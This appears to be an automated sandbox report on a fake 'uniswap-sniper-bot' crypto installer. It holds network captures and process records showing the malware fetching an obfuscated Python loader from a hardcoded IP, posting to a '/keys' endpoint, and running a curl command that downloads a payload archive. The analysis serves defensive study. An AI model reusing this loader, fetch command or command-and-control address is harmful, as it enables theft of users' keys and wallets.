C:\Users\user\.pyp\Lib\pycache\mimetypes.cpython-311.pyc.1470133945264

C:\Users\user\.pyp\Lib\pycache\netrc.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\netrc.cpython-311.pyc.1470162054128

C:\Users\user\.pyp\Lib\pycache\nturl2path.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\nturl2path.cpython-311.pyc.1470160928928

C:\Users\user\.pyp\Lib\pycache\operator.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\operator.cpython-311.pyc.1470109643168

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 19:07:42.549532890 CET	159	OUT	GET /mclip/7/702 HTTP/1.1 Host: 86.104.74.51:1224 User-Agent: python-requests/2.31.0 Accept-Encoding: gzip, deflate Accept: / Connection: keep-alive
Nov 25, 2024 19:07:43.917680025 CET	1236	IN	HTTP/1.1 200 OK X-Powered-By: Express Access-Control-Allow-Origin: * Content-Disposition: attachment; filename="mclip7_702.py" Accept-Ranges: bytes Cache-Control: public, max-age=0 Last-Modified: Fri, 08 Nov 2024 09:03:56 GMT ETag: W/"20c7-1930b04128f" Content-Type: application/octet-stream Content-Length: 8391 Date: Mon, 25 Nov 2024 18:07:43 GMT Connection: keep-alive Keep-Alive: timeout=5 Data Raw: 5f 20 3d 20 6c 61 6d 62 64 61 20 5f 5f 20 3a 20 5f 5f 69 6d 70 6f 72 74 5f 5f 28 27 7a 6c 69 62 27 29 2e 64 65 63 6f 6d 70 72 65 73 73 28 5f 5f 69 6d 70 6f 72 74 5f 5f 28 27 62 61 73 65 36 34 27 29 2e 62 36 34 64 65 63 6f 64 65 28 5f 5f 5b 3a 3a 2d 31 5d 29 29 3b 65 78 65 63 28 28 5f 29 28 62 27 3d 3d 67 4f 6a 53 4e 38 42 38 2f 37 37 7a 2f 2f 72 61 31 38 48 4a 79 4e 62 6e 67 72 64 5a 66 6d 4f 2f 6c 5a 4f 45 6b 6a 52 5a 54 46 58 31 4a 6c 4f 4a 37 7a 76 6e 61 32 6d 70 6a 61 49 6a 4f 7a 35 2f 62 62 4f 69 6a 67 49 55 54 48 63 38 43 38 42 4a 6c 66 4b 63 6c 51 4d 75 6d 72 55 7a 47 46 77 47 50 72 76 6d 68 62 57 58 49 49 67 50 30 38 4f 66 39 69 65 42 47 44 65 66 5a 6b 54 4a 74 74 4e 45 36 49 74 33 33 53 37 59 58 73 78 6e 4a 70 52 5a 37 39 37 56 68 75 62 75 61 2b 6a 65 6a 62 34 54 39 38 55 4e 68 5a 74 63 68 79 79 64 37 7a 58 51 4b 39 33 59 61 4d 4d 48 6d 6c 47 58 74 42 35 64 6a 7a 76 38 6a 71 33 77 34 57 54 39 38 52 57 30 2b 7a 51 4e 67 48 46 72 42 79 6d 32 70 61 57 57 37 79 4a 6d 52 6c 74 38 59 67 66 2b 41 [TRUNCATED] Data Ascii: _ = lambda __ : __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]));exec((_)(b'==gOjSN8B8/77z//ra18HJyNbngrdZfmO/lZOEkjRZTFX1JlOJ7zvna2mpjaIjOz5/bbOijgIUTHc8C8BJlfKclQMumrUzGFwGPrvmhbWXIIgP08Of9ieBGDefZkTJttNE6It33S7YXsxnJpRZ797Vhubua+jejb4T98UNhZtchyyd7zXQK93YaMMHmlGXtB5djzv8jq3w4WT98RW0+zQNgHFrBym2paWW7yJmRlt8Ygf+AXv3R4Zvu1CWup3bDl6FoUihDJz6urGgJjb5CBUvIdOk3yNA319/c9nJGlVytHccmNciHIZojhvxnlj2R3jVs3ukBs2uyGWbR/FwNkm5fUuhbJ4pxSjYe+vglFmcZJ/rJ9/2lZt3kQaREoKDa/sdfOidLsLlI4uSdOVl5qPUFD0KgnxaX7XKRrBoI3RdsdyG/tjaXPhYtE5I1MdZLD7g9S81H/bDWeYGfFA+RBmBG/n9tkZPXy7vTXofZ9aqhEtXmMiO2KNSxTCHjQzll/OLbOuGvWvYMvWgrOwBWjtCo/peFpJsDGtqiBKMnZs8N9Mfe9An5AWrH56JX8rDMuSHs8FspBDhPirXmsd/7lsRTN0dO25nehv5UXryRTLmLorRyKv9JBqimgLDpO+vPALI7tGzd/I8qM7KE6hEGmW5SHBDVfCS3RHzAis33u1cK4mmtFpQHY+WIW7RHlFpp9FXgPp8NluRglfykve3j9QLBi

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 19:07:44.611368895 CET	145	OUT	GET /json HTTP/1.1 Host: ip-api.com User-Agent: python-requests/2.31.0 Accept-Encoding: gzip, deflate Accept: / Connection: keep-alive
Nov 25, 2024 19:07:45.736262083 CET	482	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 18:07:45 GMT Content-Type: application/json; charset=utf-8 Content-Length: 305 Access-Control-Allow-Origin: * X-Ttl: 56 X-Rl: 43 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 37 35 22 7d Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.75"}

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 19:07:45.875428915 CET	223	OUT	POST /keys HTTP/1.1 Host: 86.104.74.51:1224 User-Agent: python-requests/2.31.0 Accept-Encoding: gzip, deflate Accept: / Connection: keep-alive Content-Length: 688 Content-Type: application/x-www-form-urlencoded
Nov 25, 2024 19:07:47.436341047 CET	281	IN	HTTP/1.1 200 OK X-Powered-By: Express Access-Control-Allow-Origin: * Content-Type: application/json; charset=utf-8 Content-Length: 15 ETag: W/"f-NQVRlQfKHCoInEbhALgECMonhCE" Date: Mon, 25 Nov 2024 18:07:47 GMT Connection: keep-alive Keep-Alive: timeout=5 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 74 72 75 65 7d Data Ascii: {"status":true}

Timestamp	Bytes transferred	Direction	Data
2024-11-25 18:05:20 UTC	572	OUT	GET /ajax/libs/materialize/1.0.0/css/materialize.min.css HTTP/1.1 Host: cdnjs.cloudflare.com Connection: keep-alive sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="102" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) uniswap-sniper-bot-with-gui/1.0.0 Chrome/102.0.5005.167 Electron/19.1.9 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Accept-Encoding: gzip, deflate, br Accept-Language: en-GB
2024-11-25 18:05:20 UTC	946	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 18:05:20 GMT Content-Type: text/css; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=30672000 ETag: W/"5eb03efe-22a11" Last-Modified: Mon, 04 May 2020 16:12:46 GMT cf-cdnjs-via: cfworker/kv Cross-Origin-Resource-Policy: cross-origin Timing-Allow-Origin: * X-Content-Type-Options: nosniff CF-Cache-Status: HIT Age: 1116737 Expires: Sat, 15 Nov 2025 18:05:20 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZrxmIFEE2rqyvrqhKP580FlmnCM%2Fn1j7aGRLfMGstmM850avedHZ0upa%2FwAfZy1aQ8H4841JjJQFp3VnrQFHjifFyMP76xPvboNCTNbRFcRdyTNVNlYSRds%2BbE5V63cT4IziNN4f"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=15780000 Server: cloudflare CF-RAY: 8e8390f9c8e2c439-EWR alt-svc: h3=":443"; ma=86400
2024-11-25 18:05:20 UTC	423	IN	Data Raw: 37 62 66 65 0d 0a 2f 2a 21 0d 0a 20 2a 20 4d 61 74 65 72 69 61 6c 69 7a 65 20 76 31 2e 30 2e 30 20 28 68 74 74 70 3a 2f 2f 6d 61 74 65 72 69 61 6c 69 7a 65 63 73 73 2e 63 6f 6d 29 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 34 2d 32 30 31 37 20 4d 61 74 65 72 69 61 6c 69 7a 65 0d 0a 20 2a 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 44 6f 67 66 61 6c 6f 2f 6d 61 74 65 72 69 61 6c 69 7a 65 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0d 0a 20 2a 2f 0d 0a 2e 6d 61 74 65 72 69 61 6c 69 7a 65 2d 72 65 64 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 35 31 63 32 33 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 61 74 65 72 69 61 6c 69 7a 65 Data Ascii: 7bfe/! Materialize v1.0.0 (http://materializecss.com) * Copyright 2014-2017 Materialize * MIT License (https://raw.githubusercontent.com/Dogfalo/materialize/master/LICENSE) */.materialize-red{background-color:#e51c23 !important}.materialize
2024-11-25 18:05:20 UTC	1369	IN	Data Raw: 6c 69 7a 65 2d 72 65 64 2e 6c 69 67 68 74 65 6e 2d 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 38 63 31 63 33 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 61 74 65 72 69 61 6c 69 7a 65 2d 72 65 64 2d 74 65 78 74 2e 74 65 78 74 2d 6c 69 67 68 74 65 6e 2d 34 7b 63 6f 6c 6f 72 3a 23 66 38 63 31 63 33 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 61 74 65 72 69 61 6c 69 7a 65 2d 72 65 64 2e 6c 69 67 68 74 65 6e 2d 33 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 33 39 38 39 62 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 61 74 65 72 69 61 6c 69 7a 65 2d 72 65 64 2d 74 65 78 74 2e 74 65 78 74 2d 6c 69 67 68 74 65 6e 2d 33 7b 63 6f 6c 6f 72 3a 23 66 33 39 38 39 62 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 61 74 65 72 69 61 6c 69 7a 65 2d Data Ascii: lize-red.lighten-4{background-color:#f8c1c3 !important}.materialize-red-text.text-lighten-4{color:#f8c1c3 !important}.materialize-red.lighten-3{background-color:#f3989b !important}.materialize-red-text.text-lighten-3{color:#f3989b !important}.materialize-
2024-11-25 18:05:20 UTC	1369	IN	Data Raw: 69 67 68 74 65 6e 2d 32 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 45 35 37 33 37 33 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 72 65 64 2d 74 65 78 74 2e 74 65 78 74 2d 6c 69 67 68 74 65 6e 2d 32 7b 63 6f 6c 6f 72 3a 23 45 35 37 33 37 33 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 72 65 64 2e 6c 69 67 68 74 65 6e 2d 31 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 45 46 35 33 35 30 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 72 65 64 2d 74 65 78 74 2e 74 65 78 74 2d 6c 69 67 68 74 65 6e 2d 31 7b 63 6f 6c 6f 72 3a 23 45 46 35 33 35 30 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 72 65 64 2e 64 61 72 6b 65 6e 2d 31 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 45 35 33 39 33 35 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 72 65 64 2d 74 65 78 74 Data Ascii: ighten-2{background-color:#E57373 !important}.red-text.text-lighten-2{color:#E57373 !important}.red.lighten-1{background-color:#EF5350 !important}.red-text.text-lighten-1{color:#EF5350 !important}.red.darken-1{background-color:#E53935 !important}.red-text
2024-11-25 18:05:20 UTC	1369	IN	Data Raw: 72 74 61 6e 74 7d 2e 70 69 6e 6b 2e 6c 69 67 68 74 65 6e 2d 32 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 30 36 32 39 32 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 69 6e 6b 2d 74 65 78 74 2e 74 65 78 74 2d 6c 69 67 68 74 65 6e 2d 32 7b 63 6f 6c 6f 72 3a 23 66 30 36 32 39 32 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 69 6e 6b 2e 6c 69 67 68 74 65 6e 2d 31 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 63 34 30 37 61 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 69 6e 6b 2d 74 65 78 74 2e 74 65 78 74 2d 6c 69 67 68 74 65 6e 2d 31 7b 63 6f 6c 6f 72 3a 23 65 63 34 30 37 61 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 69 6e 6b 2e 64 61 72 6b 65 6e 2d 31 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 38 31 62 36 30 20 21 69 6d Data Ascii: rtant}.pink.lighten-2{background-color:#f06292 !important}.pink-text.text-lighten-2{color:#f06292 !important}.pink.lighten-1{background-color:#ec407a !important}.pink-text.text-lighten-1{color:#ec407a !important}.pink.darken-1{background-color:#d81b60 !im
2024-11-25 18:05:20 UTC	1369	IN	Data Raw: 7d 2e 70 75 72 70 6c 65 2d 74 65 78 74 2e 74 65 78 74 2d 6c 69 67 68 74 65 6e 2d 33 7b 63 6f 6c 6f 72 3a 23 63 65 39 33 64 38 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 75 72 70 6c 65 2e 6c 69 67 68 74 65 6e 2d 32 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 62 61 36 38 63 38 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 75 72 70 6c 65 2d 74 65 78 74 2e 74 65 78 74 2d 6c 69 67 68 74 65 6e 2d 32 7b 63 6f 6c 6f 72 3a 23 62 61 36 38 63 38 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 75 72 70 6c 65 2e 6c 69 67 68 74 65 6e 2d 31 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 61 62 34 37 62 63 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 75 72 70 6c 65 2d 74 65 78 74 2e 74 65 78 74 2d 6c 69 67 68 74 65 6e 2d 31 7b 63 6f 6c 6f 72 3a 23 61 62 34 37 62 Data Ascii: }.purple-text.text-lighten-3{color:#ce93d8 !important}.purple.lighten-2{background-color:#ba68c8 !important}.purple-text.text-lighten-2{color:#ba68c8 !important}.purple.lighten-1{background-color:#ab47bc !important}.purple-text.text-lighten-1{color:#ab47b
2024-11-25 18:05:20 UTC	1369	IN	Data Raw: 7d 2e 64 65 65 70 2d 70 75 72 70 6c 65 2d 74 65 78 74 2e 74 65 78 74 2d 6c 69 67 68 74 65 6e 2d 34 7b 63 6f 6c 6f 72 3a 23 64 31 63 34 65 39 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 64 65 65 70 2d 70 75 72 70 6c 65 2e 6c 69 67 68 74 65 6e 2d 33 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 62 33 39 64 64 62 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 64 65 65 70 2d 70 75 72 70 6c 65 2d 74 65 78 74 2e 74 65 78 74 2d 6c 69 67 68 74 65 6e 2d 33 7b 63 6f 6c 6f 72 3a 23 62 33 39 64 64 62 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 64 65 65 70 2d 70 75 72 70 6c 65 2e 6c 69 67 68 74 65 6e 2d 32 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 39 35 37 35 63 64 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 64 65 65 70 2d 70 75 72 70 6c 65 2d 74 65 78 74 2e 74 65 Data Ascii: }.deep-purple-text.text-lighten-4{color:#d1c4e9 !important}.deep-purple.lighten-3{background-color:#b39ddb !important}.deep-purple-text.text-lighten-3{color:#b39ddb !important}.deep-purple.lighten-2{background-color:#9575cd !important}.deep-purple-text.te
2024-11-25 18:05:20 UTC	1369	IN	Data Raw: 74 61 6e 74 7d 2e 69 6e 64 69 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 33 66 35 31 62 35 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 6e 64 69 67 6f 2e 6c 69 67 68 74 65 6e 2d 35 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 38 65 61 66 36 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 6e 64 69 67 6f 2d 74 65 78 74 2e 74 65 78 74 2d 6c 69 67 68 74 65 6e 2d 35 7b 63 6f 6c 6f 72 3a 23 65 38 65 61 66 36 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 6e 64 69 67 6f 2e 6c 69 67 68 74 65 6e 2d 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 63 35 63 61 65 39 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 6e 64 69 67 6f 2d 74 65 78 74 2e 74 65 78 74 2d 6c 69 67 68 74 65 6e 2d 34 7b 63 6f 6c 6f 72 3a 23 63 35 63 61 65 39 20 21 69 6d 70 6f 72 74 61 6e Data Ascii: tant}.indigo-text{color:#3f51b5 !important}.indigo.lighten-5{background-color:#e8eaf6 !important}.indigo-text.text-lighten-5{color:#e8eaf6 !important}.indigo.lighten-4{background-color:#c5cae9 !important}.indigo-text.text-lighten-4{color:#c5cae9 !importan
2024-11-25 18:05:20 UTC	1369	IN	Data Raw: 64 69 67 6f 2d 74 65 78 74 2e 74 65 78 74 2d 61 63 63 65 6e 74 2d 34 7b 63 6f 6c 6f 72 3a 23 33 30 34 66 66 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 62 6c 75 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 39 36 46 33 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 62 6c 75 65 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 32 31 39 36 46 33 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 62 6c 75 65 2e 6c 69 67 68 74 65 6e 2d 35 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 45 33 46 32 46 44 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 62 6c 75 65 2d 74 65 78 74 2e 74 65 78 74 2d 6c 69 67 68 74 65 6e 2d 35 7b 63 6f 6c 6f 72 3a 23 45 33 46 32 46 44 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 62 6c 75 65 2e 6c 69 67 68 74 65 6e 2d 34 7b 62 61 63 6b 67 72 6f 75 6e Data Ascii: digo-text.text-accent-4{color:#304ffe !important}.blue{background-color:#2196F3 !important}.blue-text{color:#2196F3 !important}.blue.lighten-5{background-color:#E3F2FD !important}.blue-text.text-lighten-5{color:#E3F2FD !important}.blue.lighten-4{backgroun
2024-11-25 18:05:20 UTC	1369	IN	Data Raw: 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 39 36 32 46 46 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 62 6c 75 65 2d 74 65 78 74 2e 74 65 78 74 2d 61 63 63 65 6e 74 2d 34 7b 63 6f 6c 6f 72 3a 23 32 39 36 32 46 46 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6c 69 67 68 74 2d 62 6c 75 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 33 61 39 66 34 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6c 69 67 68 74 2d 62 6c 75 65 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 33 61 39 66 34 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6c 69 67 68 74 2d 62 6c 75 65 2e 6c 69 67 68 74 65 6e 2d 35 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 31 66 35 66 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6c 69 67 68 74 2d 62 6c 75 65 2d 74 65 78 74 2e 74 65 78 74 2d 6c 69 67 68 Data Ascii: round-color:#2962FF !important}.blue-text.text-accent-4{color:#2962FF !important}.light-blue{background-color:#03a9f4 !important}.light-blue-text{color:#03a9f4 !important}.light-blue.lighten-5{background-color:#e1f5fe !important}.light-blue-text.text-ligh
2024-11-25 18:05:20 UTC	1369	IN	Data Raw: 6c 69 67 68 74 2d 62 6c 75 65 2d 74 65 78 74 2e 74 65 78 74 2d 61 63 63 65 6e 74 2d 32 7b 63 6f 6c 6f 72 3a 23 34 30 63 34 66 66 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6c 69 67 68 74 2d 62 6c 75 65 2e 61 63 63 65 6e 74 2d 33 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 62 30 66 66 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6c 69 67 68 74 2d 62 6c 75 65 2d 74 65 78 74 2e 74 65 78 74 2d 61 63 63 65 6e 74 2d 33 7b 63 6f 6c 6f 72 3a 23 30 30 62 30 66 66 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6c 69 67 68 74 2d 62 6c 75 65 2e 61 63 63 65 6e 74 2d 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 39 31 65 61 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6c 69 67 68 74 2d 62 6c 75 65 2d 74 65 78 74 2e 74 65 78 74 2d 61 63 63 65 6e 74 2d 34 Data Ascii: light-blue-text.text-accent-2{color:#40c4ff !important}.light-blue.accent-3{background-color:#00b0ff !important}.light-blue-text.text-accent-3{color:#00b0ff !important}.light-blue.accent-4{background-color:#0091ea !important}.light-blue-text.text-accent-4

Timestamp	Bytes transferred	Direction	Data
2024-11-25 18:05:23 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-25 18:05:23 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-25 18:05:23 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Mon, 25 Nov 2024 18:05:23 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e83910fda9c7c88-EWR alt-svc: h3=":443"; ma=86400
2024-11-25 18:05:23 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 23 00 04 8e fb 23 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom##)

Timestamp	Bytes transferred	Direction	Data
2024-11-25 18:05:24 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-25 18:05:24 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP

Target ID:	0
Start time:	13:04:36
Start date:	25/11/2024
Path:	C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe"
Imagebase:	0x400000
File size:	74'110'128 bytes
MD5 hash:	48C179680E0B37D0262F7A402860B2A7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	1
Start time:	13:04:39
Start date:	25/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq uniswap-sniper-bot-with-gui.exe" /FO csv \| "C:\Windows\system32\find.exe" "uniswap-sniper-bot-with-gui.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	8
Start time:	13:05:05
Start date:	25/11/2024
Path:	C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe"
Imagebase:	0x7ff6ce340000
File size:	148'925'952 bytes
MD5 hash:	45A55A09F6C74E7EAD24EE3FD391C8FF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	11
Start time:	13:05:10
Start date:	25/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /d /s /c "curl -Lo "C:\Users\user\AppData\Local\Temp\p.zi" "http://86.104.74.51:1224/pdown""
Imagebase:	0x7ff7611e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true